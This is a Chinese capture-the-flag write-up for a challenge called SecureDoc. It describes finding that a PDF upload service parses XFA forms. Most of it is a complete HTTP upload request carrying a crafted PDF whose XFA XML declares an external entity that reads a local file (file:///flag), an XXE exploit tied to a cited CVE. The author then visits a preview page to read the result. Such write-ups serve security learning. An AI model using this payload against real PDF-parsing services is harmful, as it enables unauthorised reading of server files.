关联:CTF wp安全学习

SecureDoc

进去是文件上传的题,先fuzz了一下允许上传的文件,发现好像只有pdf,那应该不是传统文件上传rce。 随便上传一个pdf看到题目提示No XFA content found in PDF. This parser specializes in XFA forms. 于是找到了XFA的解析漏洞: https://www.cnblogs.com/clnchanpin/p/19474345 这里不知道是用什么解析的,但是都是解析漏洞,poc应该都差不多,所以这里可以用 文章的链接给的poc好像有点小问题,把文章中的xml替换上去就成功了。 poc:

POST /upload HTTP/1.1
Host: 5000-69ea2ac2-b83e-4979-813a-f3dbfca0ad77.challenge.ctfplus.cn
Content-Length: 1636
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWGd0SmXmAipiUh8U
Accept: */*
Origin: http://5000-69ea2ac2-b83e-4979-813a-f3dbfca0ad77.challenge.ctfplus.cn
Referer: http://5000-69ea2ac2-b83e-4979-813a-f3dbfca0ad77.challenge.ctfplus.cn/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _clck=110bj5k%5E2%5Eg30%5E0%5E2101
Connection: keep-alive
 
------WebKitFormBoundaryWGd0SmXmAipiUh8U
Content-Disposition: form-data; name="file"; filename="CVE-2025-66516-xfa-passwd.pdf"
Content-Type: application/pdf
 
%PDF-1.7
%âãÏÓ
1 0 obj
<< /Type /Catalog /Pages 2 0 R /AcroForm 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << >> >>
endobj
5 0 obj
<< /Length 486 >>
stream
<?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE xdp:xdp [
  <!ENTITY xxe SYSTEM "file:///flag">
    ]>
      <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" xml:lang="en">
        <config xmlns="http://www.xfa.org/schema/xci/3.1/">
      <present><pdf><version>1.7</version></pdf></present>
      </config>
        <template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
          <subform name="form1" layout="tb">
          <pageSet>
          <pageArea><contentArea/><medium stock="letter"/></pageArea>
        </pageSet>
        <subform>
            <field name="data">
          <ui><textEdit/></ui>
        <value><text>&xxe;</text></value>
        </field>
      </subform>
    </subform>
  </template>
    <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
  <xfa:data><form1><data>&xxe;</data></form1></xfa:data>
  </xfa:datasets>
</xdp:xdp>
 
endstream
endobj
4 0 obj
<< /NeedAppearances true /Fields [] /XFA 5 0 R >>
endobj
xref
0 6
0000000000 65535 f 
0000000015 00000 n 
0000000080 00000 n 
0000000137 00000 n 
0000000225 00000 n 
0000000762 00000 n 
trailer
<< /Size 6 /Root 1 0 R >>
startxref
827
%%EOF
 
------WebKitFormBoundaryWGd0SmXmAipiUh8U--
 

然后访问/preview/f4902791-aaee-4b83-875e-2a4f8d0195f0